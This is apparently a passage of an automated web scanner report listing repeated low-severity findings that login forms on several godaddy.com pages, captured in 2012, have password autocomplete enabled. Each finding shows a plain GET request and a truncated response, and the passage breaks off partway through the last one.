HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=3rfasjtyk4vvfpbmn4ck5452; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=3rfasjtyk4vvfpbmn4ck5452; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:34 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:34 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:34 GMT; path=/
Set-Cookie: SplitValue1=33; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:34 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/offers/hot-deals2.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=33; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:33 GMT
Connection: close
Content-Length: 96746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.57. http://www.godaddy.com/reseller/domain-reseller.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /reseller/domain-reseller.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /reseller/domain-reseller.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=wnfntnkpvzle5ijleazasavi; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=wnfntnkpvzle5ijleazasavi; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:51 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:51 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:51 GMT; path=/
Set-Cookie: SplitValue1=13; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:51 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/reseller/domain-reseller.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=13; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordsreseller=eefgzcffmjahhbddvhfddalcpcifydch; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:41:51 GMT; path=/
Date: Mon, 05 Mar 2012 01:41:51 GMT
Connection: close
Content-Length: 119058


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.58. http://www.godaddy.com/reseller/domain-reseller.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /reseller/domain-reseller.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /reseller/domain-reseller.aspx?isc=GPPT03C011&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xale0dkwllx5c5me53pio4nn; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xale0dkwllx5c5me53pio4nn; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:52 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:52 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:52 GMT; path=/
Set-Cookie: SplitValue1=63; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:52 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/reseller/domain-reseller.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=GPPT03C011&domain=edhardy.com&shopper=&privatelabelid=1&isc=GPPT03C011&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=63; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordsreseller=vaijhhkbufxfbdmcddxfocybfencogdf; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:41:52 GMT; path=/
Date: Mon, 05 Mar 2012 01:41:51 GMT
Connection: close
Content-Length: 122342


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=GPPT03C011&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.59. http://www.godaddy.com/scholarship/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /scholarship/default.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /scholarship/default.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=y1ftsx5kgoy2ttoibsvas4lw; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=y1ftsx5kgoy2ttoibsvas4lw; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:35 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:35 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:35 GMT; path=/
Set-Cookie: SplitValue1=92; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:35 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/scholarship/default.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=92; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:34 GMT
Connection: close
Content-Length: 108747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.60. http://www.godaddy.com/search-engine/seo-services.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /search-engine/seo-services.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /search-engine/seo-services.aspx?isc=GPPT03C009&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=gq52evbc0tzwssko0rg05zpv; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=gq52evbc0tzwssko0rg05zpv; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:48 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:48 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:48 GMT; path=/
Set-Cookie: SplitValue1=15; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:48 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/search-engine/seo-services.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=GPPT03C009&domain=edhardy.com&shopper=&privatelabelid=1&isc=GPPT03C009&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=15; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:47 GMT
Connection: close
Content-Length: 154370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=GPPT03C009&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.61. http://www.godaddy.com/search-engine/seo-services.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /search-engine/seo-services.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /search-engine/seo-services.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=pq3pjts2ohgngvrcdxb1zxoj; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=pq3pjts2ohgngvrcdxb1zxoj; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:47 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:47 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:47 GMT; path=/
Set-Cookie: SplitValue1=23; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:47 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/search-engine/seo-services.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=23; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:47 GMT
Connection: close
Content-Length: 151260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.62. http://www.godaddy.com/site-map.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /site-map.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /site-map.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2zsci50gmrxv4jrhbfjm2b0r; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2zsci50gmrxv4jrhbfjm2b0r; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:10 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:10 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:10 GMT; path=/
Set-Cookie: SplitValue1=41; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:10 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/site-map.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=41; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:09 GMT
Connection: close
Content-Length: 107890


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.63. http://www.godaddy.com/ssl/ssl-certificates.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/ssl-certificates.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ssl/ssl-certificates.aspx?isc=smtwfos HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xwacwvopxjwy00dcktcqebo1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xwacwvopxjwy00dcktcqebo1; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:12 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:12 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:12 GMT; path=/
Set-Cookie: SplitValue1=59; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:12 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=smtwfos&shopper=&privatelabelid=1&isc=smtwfos&clientip=174.36.218.2&referringpath=&referringdomain=&split=59; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_ssl=mbpdpjphhfyimeidybghaebaehcexaab; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgooglessl=mbpdpjphhfyimeidybghaebaehcexaab; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:59:12 GMT; path=/
Date: Mon, 05 Mar 2012 01:59:11 GMT
Connection: close
Content-Length: 146380


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=smtwfos&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.64. http://www.godaddy.com/ssl/ssl-certificates.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/ssl-certificates.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ssl/ssl-certificates.aspx?isc=gppt02C016&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=l4pa4nspaqzunfrz0ylkg5rl; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=l4pa4nspaqzunfrz0ylkg5rl; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:12 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:12 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:12 GMT; path=/
Set-Cookie: SplitValue1=41; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:12 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=gppt02C016&domain=edhardy.com&shopper=&privatelabelid=1&isc=gppt02C016&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=41; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_ssl=mikffgketgmcrghhygwejcoccbxihgrj; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgooglessl=mikffgketgmcrghhygwejcoccbxihgrj; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:41:12 GMT; path=/
Date: Mon, 05 Mar 2012 01:41:12 GMT
Connection: close
Content-Length: 147002


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=gppt02C016&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.65. http://www.godaddy.com/ssl/ssl-certificates.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/ssl-certificates.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ssl/ssl-certificates.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=23o1kmxc1brb0crv1kc2uyhz; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=23o1kmxc1brb0crv1kc2uyhz; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:12 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:12 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:12 GMT; path=/
Set-Cookie: SplitValue1=76; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:12 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=76; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_ssl=wfqebbacxfrfmcxgmaejybidyheaagtc; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgooglessl=wfqebbacxfrfmcxgmaejybidyheaagtc; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:41:12 GMT; path=/
Date: Mon, 05 Mar 2012 01:41:11 GMT
Connection: close
Content-Length: 143769


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.66. http://www.godaddy.com/ssl/ssl-certificates.aspx/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/ssl-certificates.aspx/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ssl/ssl-certificates.aspx/ HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=mzjpoxejfdig4i5qjqwccpgl; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=mzjpoxejfdig4i5qjqwccpgl; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:19 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:19 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:19 GMT; path=/
Set-Cookie: SplitValue1=45; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:19 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx/&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=45; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_ssl=tinanbvdqbpicblaqcacodndrhrhndxh; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgooglessl=tinanbvdqbpicblaqcacodndrhrhndxh; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:59:19 GMT; path=/
Date: Mon, 05 Mar 2012 01:59:18 GMT
Connection: close
Content-Length: 143772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.67. http://www.godaddy.com/ssl/ssl-certificates.aspx/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ssl/ssl-certificates.aspx/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ssl/ssl-certificates.aspx/?isc=smtwfos HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=wkiu3zqwrxhjhydmmzn115gb; path=/; HttpOnly
